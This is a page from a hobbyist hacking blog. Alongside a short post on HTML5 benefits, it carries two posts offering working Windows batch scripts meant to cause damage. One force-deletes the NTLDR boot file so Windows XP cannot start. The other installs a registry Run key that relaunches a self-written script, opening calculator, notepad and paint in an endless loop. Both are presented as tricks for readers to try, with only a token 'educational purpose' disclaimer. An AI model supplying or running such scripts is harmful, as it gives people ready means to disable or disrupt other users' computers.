Simple Thing Do Everything...

Translate

Showing posts with label Coding. Show all posts
Showing posts with label Coding. Show all posts

Html 5 benefits and Advantages!!

Tuesday, 7 July 2015
love-html5-logo
HTML5 makes creating accessible sites easier for two main reasons: semantics and ARIA.
Add extra html tag like <header>, <footer>, <nav>, <section>, <aside>, etc

1. Mutuality

Due to usability purpose the web sites made by developers are highly interactive nowadays and for this developers need to include fluid animations, stream video, play music and Social Network sites like Facebook and Twitter into the websites. Till now they have only the option to integrate it with the help of Flash or Silverlight, Flex or javascript like tools. But these consume so much time to develop and even the complexity of web application also increased. But now with the help of HTML5 it is possible to embed video and audio, high quality drawings, charts and animation and many other rich content without using any plugins and third party programmas as the functionality is built into the browser.

2. Cleaner markup / Improved Code

Awesome, Power of Misdirection!

Monday, 6 July 2015



Watch This...!!

Virus!! Windows XP is vulnerable

While googling I found, that Microsoft Windows XP is too Vulnerable, It takes just 10 Sec. to Crash Windows XP.
only thing that you need to do is: Delete NTLDR file from C:
Some Explaination:

NTLDR Stands for New Technology Loader, It is one of the Essencial Boot File, Computer Cannot Boot Without NTLDR.
And we can Simply see the File in c: (or in the drive where windows are installed), In my case Its c drive.


Now Microsoft People used some brains to Secure windows, i.e. Hidding the File with “system” attributes.


so if you want to see the file:
goto My Computers > tools > folder options > view > Unmark “Hide protected operating system files”



ntldr
 

and you can see all the files of Windows XP in C Drive
Simply Select ntldr and Delete it from the computer, Windows are gone!!! :)
we can even Write a Batch code to do the same:

@echo off
c:
cd\
attrib ntldr -r -h -s
del ntldr /f


Save the above code in notepad file, with .bat extension.
Last Step: Double Click on the Batch File. and CHEERSss….
Note:
1) Above code will only work for windows XP, Microsoft tried to secure windows 7, But unfortunately, they cannot, Will let you know the Same technique for windows 7 Soon.
2) Don’t Try it on your own Computers, Try it in Virtual machines.


Disclaimer: topperhack.blogspot.com or anyone associated with it, is not responsible for any Kind of Loss or damage to any intellectual or Physical Property due to above post. It is solely for Educational purpose

Virus Again: Funny but Dangerous!!..

Sunday, 5 July 2015
Hey all, this is not a virus, this is a concept, developed by me!! this can be developed in any language, I used Batch.
This virus got a Infinite Loop that will call Calculator Notepad and MS-Paint continuously, that’s all.


Save the Code in Notepad file with any name and .bat extension, and execute it.




Code:

@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sysfile /t REG_SZ /d %systemroot%\system32\kb.bat /f
c:

cd\

cd %systemroot%\system32

echo @echo off > kb.bat
echo :hell >> kb.bat

echo start calc.exe >> kb.bat

echo start notepad.exe >> kb.bat

echo start mspaint.exe >> kb.bat

echo goto hell >> kb.bat


Followers

© 2015 The WinDroid. Powered by Blogger
Designed by SSE